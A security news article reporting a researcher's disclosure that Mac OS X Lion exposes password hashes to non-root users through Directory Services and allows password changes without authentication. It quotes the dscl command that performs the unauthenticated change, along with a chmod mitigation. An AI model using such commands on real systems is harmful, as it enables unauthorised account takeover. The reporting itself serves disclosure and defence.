According to Patrick Dunstan of the Defence in Depth portal, back in 2009 he posted a feature on cracking passwords on Mac OS X 10.6 and earlier editions of the Mac operating systems.
In those versions of OS X, he says that the process to extract user password hashes has been the same, namely obtain the user's GeneratedUID and then use that ID to extract hashes from a specific user's shadow file.
And when it comes to Lion, the general premise is the same – although with a few technical differences, he says, adding that each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.
“The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege - typically root. So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their [hash database] shadow file whose data is accessible only by the root user… or at least it should be”, he says in his latest security posting.
Dunstan goes on to assert that, in the redesign of OS X Lion's authentication scheme a critical step has been overlooked - whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data.
This is accomplished, he says, by extracting the data straight from Directory Services.
Although Dunstan says that the current crop of Mac password crackers - from the darker side of the internet, Infosecurity notes – do not support the SHA512 plus four-byte salt password hash structures seen on OS X Lion, he has created his own simple script in python, which he is offering for download.
“Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user”, he says
“So, in order to change the password of the currently logged in user, simply use:
$ dscl localhost -passwd /Search/Users/bob
And voilà! You will be prompted to enter a new password without the need to authenticate.”
As a temporary measure to mitigate these attacks - before Apple releases a patch – Dunstan recommends users limit their standard access to the dscl utility using a `$ sudo chmod 100 /usr/bin/dscl' command.